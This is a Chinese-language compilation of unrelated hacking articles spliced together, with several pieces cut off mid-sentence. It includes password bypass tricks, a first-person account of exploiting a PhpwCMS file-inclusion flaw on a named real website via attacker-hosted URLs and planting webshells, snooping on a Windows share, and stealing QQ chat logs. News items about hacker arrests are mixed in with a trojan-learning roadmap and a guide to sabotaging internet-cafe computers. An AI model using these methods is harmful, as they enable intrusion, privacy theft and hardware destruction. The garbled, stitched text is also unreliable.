我们知道，为了有效维护用户的使用权，进入电脑、上Internet、保护文档等，都要用到不同的账号或密码口令，可以说这些密码就是使用电脑的“通行证”。如果万一忘记或弄混了哪个密码，机器是不认人的，没准儿会误了你的大事。为了减少遗忘密码给我们带来的麻烦，学上几招密码通关的本领，说不定哪天就能派上用场，可以应付困扰自己的密码问题。  

　　一、破解CMOS开机密码  

　　使用电脑，首先需要开机。因此开机密码是我们最先要遇到的。虽然CMOS种类各异，但它们的加密方法却基本一致。一般破解的方法主要从“硬”和“软”两个方面来进行。  

　　1.“硬”解除方法  

　　硬件方法解除CMOS密码原理是将主板上的CMOSRAM进行放电处理，使存储在CMOSRAM中的参数得不到正常的供电导致内容丢失，从而起到解除CMOS密码的目的。一些报刊对如何破解CMOS密码的通常做法，如跳线短接法和电池短接法已有较多介绍，操作起来也十分方便。但我们这里要介绍的是个另类技巧，这也是一些电脑DIY们很喜欢用的方法。方法也很简单：打开机箱，将硬盘或光驱、软驱的数据线从主板上拔掉，然后再启动计算机，BIOS会在自检时报告错误并自动进入CMOS，此时就可以重新设置BIOS内容了。  

　　2.“软”解除方法  

　　严格地说，“软”解除CMOS密码没有“硬”解除方法那么彻底，但也十分奏效。CMOS密码根据需要，可设为普通级用户密码和超级用户级密码两种。前者只是限制对BIOS的修改，可以正常启动电脑和运行各类软件，而后者则对进入电脑和BIOS完全禁止。  

　　1)破解普通用户密码

　　首先用DOS启动盘启动电脑，进入DOS状态，在DOS命令行输入debug回车，然后用所列的其中任何一种方法的数据解除CMOS密码，重新启动电脑，系统会告诉你CMOS参数丢失，要求你重新设定CMOS参数。经过试验，这是一种很有效的方法。“-”后面的字母“O”，表示数值输出的地址，70和10都是数值。  

　　2)破解超级用户密码  

　　这里我们需借助外部工具。我们选用最为经典的BiosPwds，是一款免费软件，比较适合对DOS不太熟悉的电脑用户，很久以前就为人们所熟知，只要轻轻一点，就会将用户的CMOS密码显示出来。工具最新版本1.21，127KB，免费下载地址：http：//bj2.onlinedown.net/soft/8107.htm。下载解压后，双击该软件的执行文件，在出现的界面中点击“Getpasswords”按钮，稍等二、三秒即会将BIOS各项信息显示于BiosPwds的界面上，包括：Bios版本、Bios日期、使用密码等，这时你便可以很轻松地得知BIOS密码。  

　　二、破解系统密码  

　　系统密码是你登录到操作系统时所使用到的密码，它为你的计算机提供了一种安全保护，可以使你的计算机免受非法用户的使用，从而保障电脑和机密数据的安全。  

　　1.Windows98/ME的系统登录密码  

　　①取消法  

　　最简单的一种方法是在系统登录要求输入密码时，你什么也不用输入，直接点击取消，可以进入操作系统。但用此种方法只能访问本机的资源，如果计算机是局域网的一部分，你将不能访问网络资源。

　　②新增使用者

　　当你由于密码问题被挡在系统之外时，不妨为系统再新增一个使用者，然后重新登录，一样可以登录系统并访问系统或网络资源。单击“开始”/“设置”/“控制面板”，然后双击“用户”，打开“用户属性”对话框。接着，根据提示依次输入“用户名”、“密码”、“个性化项目设置”中所需的内容，最后单击“完成”。

　　③删除“PWL”文件

　　删除Windows安装目录下的

　　一、看见漏洞公告

　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php  

　　include/inc_ext/spaw/dialogs/a.php  

　　include/inc_ext/spaw/dialogs/colorpicker.php  

　　include/inc_ext/spaw/dialogs/confirm.php  

　　include/inc_ext/spaw/dialogs/img.php  

　　include/inc_ext/spaw/dialogs/img_library.php  

　　include/inc_ext/spaw/dialogs/td.php  

　　文件中的$spaw_root的没有过滤的情况下，包含'**class/lang.class.php'。具体的代码公告中没给出来。可以利用下面的url利用此漏洞，http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/，其中website1是有漏洞的网站，website2是攻击的网站，website2所在的目录下有class/lang.class.php文件。  

　　二、学习的第一天  

　　马上行动，我用google搜索inurl:"phpwcms/index.php?id="，搜索到54,800多项结果，基本上都是国外的。看来这次发了，这次国外的wenshell肯定是一大堆了。呵呵……，嘿嘿……随便点击一个网站，是美国的：http://arena-sv.jans-webdesign.com，不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测，当然http://www.baidu.com/class/lang.class.php是不存在的，这时页面显示如图一所示，提示没有找到页面。这表明了这个网站存在文件包含漏洞，象这样的有漏洞的网站随便点击一个就是。  

　　检测出有文件包含漏洞  

　　现在开始利用这个漏洞，在我的支持asp网站根目录建一个class的目录，在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候，提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell，浏览的时候还是出现找不到文件的问题。  

　　郁闷啊……如果能建一个txt文件代替class/lang.class.php 多好啊。我问了我们工作组的学linux的同学，他们说可以用问号优化。但是偶不会啊，听上去很复杂的，等明天再来做吧，休息，休息。

　　三、学习的第二天

　　去搜索的发现有漏洞的网站变得比较少了，大部分的网站都被漏洞补了，还有一部分美国的网站上被挂了一些与反战争有关的图片或者一些国旗。还好的是昨天的哪个网站没有被人家黑掉，还有机会学习。我在无意中得到了jsp的wenshell，试着写了一个php文件，在浏览器浏览的时候出现的是源文件。看来现在现在可以利用这个jsp的webshell来作跳板。  

　　在webshell里面建一个class的文件夹，然后在class目录里面上传一个lang.class.php空文件，在文件里面写上.在浏览器上浏览http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 显示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。  

　　php环境信息

　　编辑lang.class.php的文件，先写了一个phpspy。但是登陆webshell的后，页面转到其他的页面。还是先传一可以上传的文件的马儿吧，传了一个国外的php木马，木马的功能很的大，浏览http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。  

　　包含的国外php木马  

　　但是这个国外的php马还是上传一个经过修改的phpspy吧，用着舒服一点，上传得文件改为了imge.php，现在访问http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305，登陆后一台webshell就在我们的眼前了。权限也不错，但是由于是linux系统，也不知道怎么去提权，还是再放一下吧!

　　phpspy上传成功  

　　四、学习的第三天

　　对linux下的提权一点都不了解，没办法只有寻求帮助了。Jinsdb师兄叫我去一些好的网站找一下exp看看，他还告诉我了上次在我的网站中的php文件浏览的时候是找不到文件的原因：因为我的系统是2003的，所以要在IIS的ISAPI 筛选器中加.php后缀,在xp下访问php文件直接就可以浏览。看来上次我得到的服务器基本上是2003的。

　　看来这次的学习也蛮有意义的!发现一点，国外的网站的管理人员比较重视安全。在出现漏洞的第二天，很多网站都把漏洞补了，还有的网站被入侵后能马上发现，并及时清除了webshell。  

　　我发现了一个网站，于是常规入侵。很好，它的FINGER开着，于是我编了一个SHELL，aaa帐号试到zzz（by the way，这是我发现的一个网上规律，那就是帐号的长度与口令的强度成正比， 如果一个帐号只有两三位长，那它的口令一般也很简单，反之亦然，故且称之为若氏定理吧），结果一个帐号也不存在，我没有再试它的帐号。因为我被它开的端口吸引住了，它开着WWW，我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在。：（ 有几个错误，但我不知道如何利用，算了。又绕着主机转了几圈，象狐狸遇见刺猬，无从下嘴。   

　　还是看看root的信息吧：  

　　finger root@xxx.xxx.xxx
　　Login name: root In real life: system PRIVILEGED account
　　Directory: / Shell: /bin/sh
　　Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
　　No Plan.   

　　root经常来，那个202.xx.xx.xx就是他用的工作站了，从那会不会看到点东西呢？  

　　net view \202.xx.xx.xx
　　Shared resources at \202.xx.xx.xx   

　　Sharename Type Comment
　　x
　　x
　　我的公文包
　　The command was completed successfully.   

　　在上网的机器上开着WINDOWS的“文件和打印机共享”的服务，是很多人容易掉以轻心的，这个root没有例外。如果它的C盘共享了而且可写那就好了，但那是做梦，现在开了共享的目录没有一个是根目录，连D驱的都没有。别着急，慢慢来。x掉的那些文件夹都没用，不能写，里面尽是些英文原著，这个root还挺行的。“我的公文包”吸引了我的注意，这是一个用于将不同的机器上的资料进行同步的工具，很显然这个root要经常更新主机上的主页，有时候在自己的机器上编，有时候在主机上编……所以很重要的一点：“我的公文包”的共享一般都是可写的！

　　那我再进去看看。

　　>net use i: \202.xx.xx.xx
　　>i:
　　>echo asdf>temp.txt   

　　不错，确实可写。  

　　>del temp.txt   

　　不留痕迹——黑客的习惯。

　　>dir/od/p   

看看都有些什么……　倒数第二排那个是什么？“X月工作计划.doc”！就是它了，既然是计划就不可能写完了就丢一边，它肯定会再次打开它的——至少下个月写计划时要COPY一下:->   

　　当你成功入侵一台远程主机后，你一定很想知道这台机器的主人到底是一个怎样的人吧?(如果是个可爱的妹妹说不定还可以成为好朋友呢，本人就有先例，呵呵，保密)看他的QQ聊天纪录就是一条捷径。虽然现在支持上传下载的木马倒是不少，传送单个文件还可以，但对整个目录却无能为力了。有人说，将它压缩后再传送不就可以了吗?对，可以。但这样会有两点困难：

　　1. 支持远程压缩的木马极少(netspy2.0可以)2，压缩后仍然很大。  

　　其实真的需要传送整个QQ目录不可吗?当然不用了!下面我就告诉大家用最简单的方法达到同样目的的捷径。  

　　(一)下载。打开远程机器上的QQ目录，找到以她的号为目录名的文件夹，打开，里面一大堆文件吧?别管它们，找到两个文件:msg.db user.db再回到起始的QQ目录里，找到一个dat文件夹，打开，找到一个QQ2000.cfg。OK!现在就将这三个文件一个个地下载到自己的计算机上来吧。(通常三个文件加在一起也只有几百k)  

　　(二)组装。将你自己的整个QQ目录复制一个，我们的组装就在这个备份目录里实现。先将QQ2000.cfg用下载来的那个替换掉。再创建一个以那人的QQ号为目录的空文件夹，将msg.db user.db这两个文件放到这个文件夹里。OK!  

　　(三)读取。点小企鹅登陆吧，你会惊奇地发现他的号码出现在登录框中了，但你不知道他的密码怎么办，这时就要用到一个小工具——魔亦神(可以在本站下载到)，将它粘贴到QQ的目录上，你就可以不用填入任何密码直接登录拉!登陆后是处于离线状态的，但可以查看他的一切记录!爽吧!

　　说明一下：他所有的聊天纪录都是在这个msg.db目录里。QQ2000.cfg则是负责将他的号码出现在登录框中，而user.db则是让登陆器误以为你已用她的QQ号和密码登录过一次了。  

　　特别再说明一下：如果你用的是冰河等能够偷密码的木马，并已得到了他的QQ号和密码，那么你只需要下载一个msg.db，像刚才那样替换操作，再用她的密码登陆上网一次就可以了，什么工具也不用!

　　新西兰警方11月30日说，他们逮捕了一名涉嫌领导“黑客”团伙的少年。这个国际网络犯罪团伙曾侵入全球130万台计算机，利用“僵尸程序”和“分布式拒绝服务”等“黑客”攻击方式，盗取计算机使用者的银行账号，牟取暴利。  

　　少年嫌犯  

　　美联社30日报道说，这名涉案少年现年18岁，家住新西兰北岛哈密尔顿市，以网上身份“AKILL”闻名。考虑到他开始作案时还不满18岁，警方没有公开他的姓名。  

　　新西兰警方电子犯罪中心负责人马丁·克莱恩杰茨说，新警方与美国联邦调查局(FBI)以及荷兰警方从今年6月起开始合作，追查一起国际有组织网络犯罪案。警方在“AKILL”家中将他逮捕。接受盘问后，“AKILL”获释，没有受到任何指控，但警方仍将他视为调查对象之一。  

　　克莱恩杰茨认为，“AKILL”涉嫌领导“一个使用"僵尸程序"侵入他人计算机的网络犯罪团伙”。  

　　他说，这个少年涉嫌负责编写“黑客”程序，之后卖给多个“黑客”，而这些程序能攻破普通计算机的反间谍软件，“他非常聪明，在这方面经验老到”，“我们已缴获了一些作案的计算机，并与"AKILL"交谈，我们正努力搜寻证据，案情将会逐渐明朗，但调查尚处于初级阶段”。  

　　团伙犯罪

　　《新西兰先驱报》报道说，“AKILL”涉嫌领导的国际网络犯罪团伙名叫“A组”。  

　　FBI怀疑“AKILL”和一名美国同伙于2006年2月23日利用“黑客”手段，致使美国宾夕法尼亚大学工程学院的网络服务器瘫痪。这名涉案同伙现年21岁，名叫瑞安·戈尔德施泰因，已在美国遭到起诉。  

　　官方说，这台服务器在正常情况下每天应接收450份文件下载请求，而在被“黑”的4日内，服务器却接到7万份请求。经过调查，FBI找出两个涉案计算机代码，其中一个属于戈尔德施泰因，而另一个则来自新西兰。  

　　戈尔德施泰因被指控涉嫌共谋网络诈骗，如果这项罪名成立，他将面临最多5年监禁和25万美元罚款。  

　　戈尔德施泰因自己拒不承认有罪，在交保释金后获释，正等待定于明年3月10日开始的庭审。  

　　损失惊人  

　　《新西兰先驱报》报道说，在宾夕法尼亚大学工程学院的网络服务器瘫痪一案中，“AKILL”和戈尔德施泰因涉嫌令5万台计算机感染“僵尸程序”。  

　　这种程序是散发间谍软件、广告软件和垃圾邮件的罪魁祸首，它通过聊天室、文件共享网络感染存在漏洞的计算机，而这些被感染的计算机所保存的信息都可以被 “黑客”取用。“黑客”利用“僵尸程序”窃取他人信用卡信息、破坏股票交易等。FBI正在全力缉捕这一利用“僵尸程序”在网上作案的“黑客”团伙。自6月份开始调查以来，已经有8人遭到指控，还另外发出了13份通缉令。FBI估计这一团伙利用的“僵尸程序”已感染了全球上百万台计算机，给受害者带来的损失超过2000万美元。  

　　克莱恩杰茨说，“AKILL”可能面临的指控包括未经许可侵入他人计算机以及拥有“黑客”工具，如果上述罪名成立，他将被判最多10年监禁。

　　据国外媒体报道，英国三名高级法官周一表示，允许著名黑客加里·麦金农(Gary McKinnon)就反对被引渡到美国一事上诉至英国国会上议院。麦金农被美国政府称为“史上最大军方网络黑客”。  

著名黑客加里·麦金农  

　　新浪科技讯 北京时间10月23日消息，据国外媒体报道，英国三名高级法官周一表示，允许著名黑客加里·麦金农(Gary McKinnon)就反对被引渡到美国一事上诉至英国国会上议院。麦金农被美国政府称为“史上最大军方网络黑客”。  

　　美国政府此前称，麦金农身为英国计算机专家，于2001年到2002年间共侵入了美国政府部门下属97台电脑，其中包括五角大楼、陆军、海军和美国国家航空航天局的系统，直接/间接损失达70万美元。美国检察部门则表示，麦金农曾致使美国军方华盛顿地区的2000多台电脑被迫关闭24小时，制造了“迄今为止世界上最严重的军用计算机入侵事件”。

　　美国一家地方法院去年5月判定，应将麦金农引渡到美国受审。英国最高法院今年4月同意了该要求。麦金农为此提出上诉。麦金农的律师称，如果将麦金农引渡到美国，将侵权其人权并违背英国正常司法程序;考虑到麦金农的英国国籍和不同政治观点，反对将他引渡到美国。麦金农2002年于英国被捕，他去年在接受外界采访时表示，之所以入侵美国政府电脑网络，只是想查看一下这些电脑中有关外星人及不明飞行物( UFO)的资料。  

　　如果麦金农被引渡到美国受审并判定有罪，将可能被判最长在监狱中服刑70年，并交纳175万美元罚款。  

她们60年前开始玩电脑，曾为世界上第一台计算机编程序，也是世界上第一批“黑客”，曾为世界第一台电子计算机ENIAC编写过程序。

　　据美国媒体5日报道，在电脑时代，许多老年人不甘落后，然而鲜为人知的是，在美国仍然生活着几名80多岁的“奶奶级”电脑高手：她们曾在二战中帮助军方精确地计算出炮弹发射轨迹，曾为世界上第一台电子计算机编写程序，还是世界上第一批“黑客”。半个多世纪来，人们对这批“奶奶级”电脑高手毫无所知，直到日前，她们的故事才首次浮出水面，并正在被拍成一部名叫《隐形电脑：ENIAC程序师的故事》的纪录片。

　　孙子炫耀牵出传奇故事   

　　现年83岁的美国新泽西州老太太贝蒂·巴蒂克是5个孙子的祖母，喜欢上网打桥牌。然而鲜为人知的是，她其实是世界上最早的一批女性电脑高手，她曾为世界上第一台计算机编过程序。

　　对于这一点，即使十分熟悉贝蒂的朋友也不知道。不过，贝蒂的孙子亚历克斯却早就知道奶奶的秘密。一天，他在学校里向老师炫耀说，自己的奶奶是世界上最早的计算机先驱和电脑高手。当时，老师以为小孩子是在吹牛，还狠狠批评了他一顿。为了还儿子一个诚实的名声，亚历克斯的父母亲自到学校向那名教师解释了一切。

　　帮助军方计算弹道轨迹

　　贝蒂的传奇故事随即引起了历史学家的关注。

　　据悉，贝蒂和计算机打上交道可以说是阴差阳错。1945年，当时20岁的贝蒂还是美国密苏里州西北教师学院一名数学专业的女大学生。随着二战接近尾声，美国陆军由于缺少男数学家计算弹道发射轨迹，开始在宾夕法尼亚州大学发起了一项绝密的“阿伯丁试验场”行动，招募女性成为计算弹道轨迹的“人体计算机”。

　　贝蒂成功地被美国陆军录用，成了一名“军中数学家”，帮助陆军精确地计算各种武器的弹道轨线。与贝蒂一同被招募的还有另外5名女学生。

　　为首台计算机编写程序

　　二战结束后，贝蒂继续为军方从事计算机研究工作。1946年，她和另外5名女伙伴开始为世界上第一台电子计算机ENIAC编写程序。1949年，她又帮助美国诺斯罗普航空公司为世界上第一台商用计算机UNIVAC I设计逻辑程序，这台计算机在1951年首次被美国人口普查署投入了使用。

　　据悉，为世界上第一台计算机ENIAC编写程序堪称是一项考验身体毅力、创造力和耐力的严峻工作，因为这台机器在当时来说实在太复杂了，它占地170平方米，重达30吨，包含了大约18000个电子管、70000个电阻器和至少3000多个开关。1946年2月，美国陆军军械部和宾夕法尼亚大学莫尔学院联合向世界宣布ENIAC的诞生，从此揭开了现代电子计算机发展和应用的序幕。

　　世界上第一批“黑客”

　据悉，贝蒂甚至还是世界上最早的女“电脑黑客”，因为在早期的计算机程序研究中，她和其他5名女同事还曾合法地“黑”过世界上首批计算机中的一台，并将它转变成了一台程序储存器，从而帮助计算机真正地迈入了数字化时代。

　　贝蒂婚后生有3名儿女，为了照顾3个孩子，几年后她被迫离开了计算机研究行业。

　　被美国计算机史遗忘

　　据悉，在6名最早的女性电脑高手中，目前只有3人还活在世上，都已是80多岁高龄。

　　几十年来，贝蒂和她的5名女同事一直被美国计算机史所忽略和遗忘。在ENIAC计算机发明40周年庆祝典礼中，这些最早的先行者甚至没有获得邀请，唯一一名被邀请的女性还是作为另一名计算机专家的配偶出现的。

　　最近，贝蒂的故事正被拍成一部纪录片。据纪录片制片人、计算机历史学家凯西·克莱曼说：“这部纪录片不仅仅是讲述她们的传奇故事，而且对美国目前的计算机业具有重要意义，因为如今的美国计算机界仍是男性主宰的世界。而这几位‘奶奶级’电脑高手的事迹证明，女性在计算机研究上的能力丝毫不亚于男性。”

　　核心提示：在美国仍然生活着几名80多岁的“奶奶级”电脑高手：她们曾在二战中帮助军方精确地计算出炮弹发射轨迹，曾为世界上第一台电子计算机编写程序，还是世界上第一批“黑客”。

　　纪录片制片人（左）和4名“奶奶级”电脑高手在一起，她们分别是贝蒂（左二）、马琳（左三）、凯瑟琳（右一），前排坐着的贝蒂·辛德·霍伯顿目前也已去世。  

　　新西兰联同美国联邦调查局和荷兰的警方瓦解了一个国际计算机犯罪网络，拘捕了一名18岁青年黑客，怀疑他利用一个名叫“botnets”的网络，以遥控的 方式入侵及控制全球各地多达250万台计算机，从机主的银行户口盗取了数以千万美元计的巨款。很多被侵袭的计算机机主初时还懵然不知，直至发现失款后才如梦初醒。

　　据报道新西兰警方联同美荷兰警方进行调查后，侦破此案及查出该名年轻黑客的身份。警方本周认为时机成熟，在新西兰北岛汉米尔顿市进入涉案青年的寓所内，把他拘捕，并充公多部计算机。警方人员形容他是“国际电子犯罪网络大王”。  

　　美国联邦调查局员早在今年6月宣布知道有黑客利用“botnets”横行，当时已经有百多万部计算机受到感染。自6月至今，再有多大约150万部计算机遇袭，金钱损失估计高达2000多万美元。  

　　新西兰警方发言人克莱特杰斯接受电台访问时称，涉案青年的网名叫“AKILL”，但当局基于法律理由，不会公布他的真实姓名。他被捕后采取合作态度，告诉探员这个电子犯罪网络怎样运作。  

　　警方现时还未正式落案控告他任何罪名。调查工作仍在很初步的阶段，探员还要搜集更多证据。  

　　不过，克莱特杰斯表示，警方稍后便会落案控告他非法侵入他人计算机、非法使用黑客工具等罪名。若被法庭裁定罪名成立，他最高会被判入狱10年。

　　“Spybot”和“botnet”都是黑客常用的工具，可以散播恶毒的计算机病毒，神不知鬼不觉地侵袭他人的计算机，然后盗取机主的个人数据，例如银行账户号码和信用卡号码，再进行各种犯罪勾当。  

　　探员称，涉案青年亲手写的程序，可以避开现时常用计算机侦察和防毒软件。除了亲自发动袭击外，他还把自己创的技术，卖给其它黑客。  

　　克莱特杰斯指出，涉案青年已经作恶了好几年，他最初犯案时，还未满18岁，当时还在念中学。探员形容他是一个非常聪明的人，但却把聪明应用在犯法的行为上。  

　　或许你并不想成为一个黑客而是好奇，或许你只是为了高超的技术。无论是什么都需要刻苦的去学习，没有什么事情是不付出努力就能轻易成功的，之所以叫成功是因为那个人拥有着与众不同的本领，如果你想拥有超群的本领就要不断的去学习，而学习也要讲究一定的效率。今天inoker的这个开始也正式我作为一个站长所要为他付出的努力，我知道一个人支撑起一个站很难，不过当我撑到不难的时候我知道我的日子会很好过。  

　　先来说说很多朋友们的烦恼，是不是每次进一个论坛或者在百度搜索一篇菜鸟文章都要很费劲的来读，甚至看到几行便没有信心在读下去，因为什么?因为读不懂。原有的充满好奇的那种信心也随之逝去了。最后因为难以继续学习下去而放弃了黑客。  

　　我曾经有过深深的体会。好比一条狭窄的小路，当你选择工具的时候就必须考虑是自行车 汽车 还是路行，选择好的方法才能得到一条捷径。下面我把大致的一条菜鸟路告诉给大家，也是我几年来东一条路西一条路走出来的捷径，希望对你们能有所帮助。但要记得，不付出努力即使一米长的小路，你不迈腿一样是一事无成，要想学就得做好下苦心的准备，不是说你今天按照别人做好的动画跟着去做刷到了几个QB就说明你是个黑客了，你内心的喜悦如果可以唤醒对黑客技术的兴趣，那还是值得的。一句话，我希望你走下去。  

　　自己一定要对自己有个计划。不能今天上午学学黑客有兴趣了 下午又对游戏有兴趣了。学到的知识相当与没学，学东西一定要有总体上的安排。我哪天哪天要计划学什么。预计多少天掌握熟练。这些在你学之前一定要想。我们提倡一种分类的学习方法，下面我说说分类学习的基本内容。前几天看见网安的这个分类学习路线我想在这里在补充点。  

　　1.黑客术语基础：主要把一些常用黑客术语搞清楚，比如什么叫webshell什么叫注入，什么叫旁注，还有一些常用工具的功能，比如nc，sc等等.还有就是当你遇到一个不明白的黑客术语时就应该首先搞清楚这个术语的意思，到百度或者GOOGLE先查好了他的意思。在进行学习，不可以朦胧的去接触不懂的知识。要先搞清楚。(学习一个星期)  

　　2.灰鸽子配置与使用：通过学习要达到正确配置灰鸽子并能正常上线.对它的功能进行操作训练.(学习二天)这个不用说了，灰鸽子大家都知道黑客必须得接触了解的东西。  

　　3.网页木马制作与传播(一个星期)  

　　4.网站入侵(差不多一个月)

　　5.木马特征码修改(四五天)  

　　当然知识块的划分与学习时间，可根据自己身情况进行适当选择.

　　下面我把分类学习法过程，技巧，并结合自己在实际学习中以实例形式讲解这种学习方法的具体步骤.  

　　分类学习法的主线:  

　　收集资料----看动画教程与技术文章----实战训练----回过头再看教程与文章---自己制作动画教程与写文章.

　　按照上面的路线反复练习我想你一定会在很短的时间内有很大的提升。  

　　下面对各个环节进行讲解:

　　一、收集资料  

　　这个环节，主要目的是收集到尽量多的某类知识块的相关动画教程和技术文章.收集方法主要有两种方法:第一种，利用百度，google，搜索.比如我想找网站入侵相关教程，可以在百度google中输入关键字"网站入侵 空格 教程"，这样就可以收集大量教程和文章，可以灵活变化关键字，比如输入脚本入侵 空格 动画，ASP入侵等等，可以搜到大量网站入侵方面的资料，统统把它们收集整理起来。第二种，利用大型黑客网站的站内搜索功能。这种搜索比百度和google命中率要高的多。比如你想找网页木马相关教程，你可以到各大黑客网站，在站内搜索内输入关键字网页木马。

　　二、看动画教程与技术文章  

　　在看之前，你要准备一个笔记本，专门用来记录在看动画或文章时，不明白的或疑惑的地方，在看的过程中，你可能有些地方看不明白，没关系，把不懂的地方记录下来，当然看动画  

　　与文章时要注意以下几点:

　　1.要深刻理解动画教程整体思路

　　2.注意观察动画的每个操作细节，一有不清楚的就要马上记录.那如何解决记录着不懂的地方呢?通过以下几种方法解决。  

　　1.论坛提问:比如菜鸟提问专区，把你遇到的不明白地方描述清楚，发到论坛上，当然你还可以到其它的黑客论坛提问。  

　　2.向黑客群或朋友请教，这里你要多加几个黑客技术群，多交几个要好的黑客技术爱好者，然后，把你的疑难问题拿出来与大家一起讨论，一般也能解决。  

　　3.反复看动画教程，技术文章，有时候，我们看一遍可能不能理解，但反复的看，反复的思考，往往都能解开动画或文章中的疑难问题。  

　　4.用百度，google搜索相关内容，同样利用关键字进行搜索相关内容。这种方法还是不错的，在你搞懂了你的疑难问题的同时也搞懂了N个其它相关问题。  

　　三、实战训练

　　这一阶段也是最重要的，刚开始你可以按照动画步骤来操作，很多疑难问题在实际操作才能真正体会到，同时在操作中也会得到解决。当然你在操作过程中遇到困难还可以回过头再看动画，并一直反复这个过程。慢慢的就会变成自己的技术。

　　四、回过头再看动画与文章

　　在操作过程中，遇到的疑难问题，然后我们带着这些问题回过头来看动画，相信理解的更深刻了。目的也更明确了。在这个过程中特别要注意在你操作的每个细节与动画中的细节作对比，发现存在问题的地方及时纠正。  

　　五、自己制作动画或写文章  

　　经过一段时间的学习，你可能对某个知识块也有较深的理解，也有自己的见解，所谓熟能生巧，熟练了自然而然也有个人的心得体会。这时候，你可以把你的新的入侵思路和技巧做成动画或写成文章呀，这不但提高了你的思维能力同时也锻炼了你的实际操作水平。这也是提高黑客技术水平的一个重要方法。

　　所以我在这里建议：若你有新的入侵思路或新的入侵技巧，不要埋在心里，做成动画。你会在不知不觉中进步。  

　　以上就是我个人认为效果不错的黑客学习方法，当然还结合了以下四个方面的技巧。

　　一、做黑客笔记  

　　1.记录实战入侵过程中的疑惑问题  

　　2.在看别人动画或文章时，不明白或不理解的地方也记录下来。  

　　3.同时，在学习过程中，遇到的入侵小技巧，入侵常用命令，优秀黑客工具，经典方法也一一记录下来。以后入侵或遇到难题时，随时都可以拿来查看。

　　二、收集整理优秀文章，动画教程，黑客工具。  

　　1.分类整理优秀的技术文章。  

　　2.收集整理经典的有技术含量的动画教程  

　　3.收集经典的优秀的黑客工具，大家都应该有自己的黑客工具箱，并分类整理存放好。  

　　收集整理的目的是方便以后的学习。  

　　三、在看别人动画或文章时应该思考的问题。  

　　1.领会动画整体思路。

　　2.记下不明的或疑惑的细节。  

　　3.评价别人的动画，有何缺点，有何优点，学会分析和思考。同时要敢于提出自己的想法，如何才能进一步完美他的入侵方法。  

　　四、勤做动画  

　　这里做动画的好处，我不多说了，只要你做多了，自然而然就会体会到其中的好处!  

　　只要具备以下条件的，都可以做成动画，我想，也是你掌握技术的最好方法，所以这也是行之有效的提高黑客技术的好方法。  

　　1.看到好的文章就应做成动画：  

　　2.好的工具，经典工具的使用也做成动画：

　　3.入侵总结：  

　　之前我看到很多人做过木马传播的方法，也看过相关木马传播的文章，不过都比较零散，后来我又参考了相关杂志后就制作了木马传播的综合教程----木马传播终级大套餐。  

　　4.新思路新技巧：  

　　如果你有好的入侵思路或方法，也可做个动画.  

　　5.拓展，延伸别人的动画：  

　　主要是看了别人做的入侵动画，给你带来的新的入侵方法和技巧.  

　　6.改善完美别人的动画：  

　　从以上可以看出，我们要做的教程，尽量不要重复别人的教程，要有自己的创意和想法。所以，大家可以参考以上方法进行做动画，同时在看别人教程时，不要一味的照抄照搬，要有自己的见解，要学会思考，要善于总结，在看别人教程时还要不停的反问自己，能进一步入侵吗?他的这种入侵方法有什么缺点吗?能进一步完善他的入侵方法吗?只要你做到以上几点，我相信，你的技术也会突飞猛进的。  

　　首先，我们了解被破坏网吧的客观环境，要了解网吧人员的实地监测等。尤其要注意看有没有闭路电视监控。如果网吧人员对你的个人资料相当熟悉，就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了，免的惹麻烦。以下破坏方法不分先后，请量力灵活运用若干破坏组合。具体操作细节不详细所了。  

　　1、COMS破坏  

　　尽情乱调吧，电脑系统的好多问题都出在COMS设置错误!!例如：电源设置错误，硬盘数据调错等。这样的隐形错误好多都是不容易发现。最现眼莫过于临走前，加个开机密码，你只用几秒钟，网管人员就要用几分钟拆机去掉COMS密码。  

　　2、CIH类破坏 CIH类的病毒够厉害吧  

　　除了CIH病毒，其他攻击硬件的病毒也有不少哦!把病毒发作条件调到我们离开才发作。

　　3。硬盘类破坏 硬盘破坏软件多到泛滥。黑客站(病毒站)每天都出现更厉害的新病毒。旧病毒“KV300逻辑锁”就蛮厉害的，软硬盘都无法启动!HD-FILL等蠕虫软件也是有大杀伤力，硬盘瞬间充满废文件，硬盘无法使用!相反的做法是低格硬盘类病毒，低格会物理伤害硬盘，多低格硬盘就会报废!  

　　4、超频破坏  

　　超频对电脑有损害，大家都知道!超频带来的不系统稳定，是隐性的，不容易发现!CPU软超频，显卡也超频，硬盘也可以超频等!超频也容易引来黑屏和蓝屏。此法阴险，需要破坏者有相当的电脑知识.

　　5、系统破坏 破坏必修课  

　　对付网管软件(美萍，网管大师等)，多留意黑客网站上的新破解方法。有心就很容易找到的。对付隐藏的系统克隆文件也要找出来(用PQ6等)，大肆破坏，至少也要加些病毒进去呀。同时也要把隐藏的分区找出来，进行必要的破坏。最好我们也把搞点隐藏，可以隐藏网吧的分区(文件)等。该出手时，就出手，决对不要手下留情，对敌人仁慈就是对自己残忍!还有就是破坏网吧的杀毒软件和防火墙，这是必要的，象卸掉KV3000，安装假的KV3000等，至少也要让杀毒软件带毒。破防火墙的软件去病毒网站找找，包你有惊喜发现。当然我们也可以下载其他的系统保护软件，让WINDOWS锁定，让其他人不能设置保存。

　　6、破解密码 电脑上有很多密码是有用的  

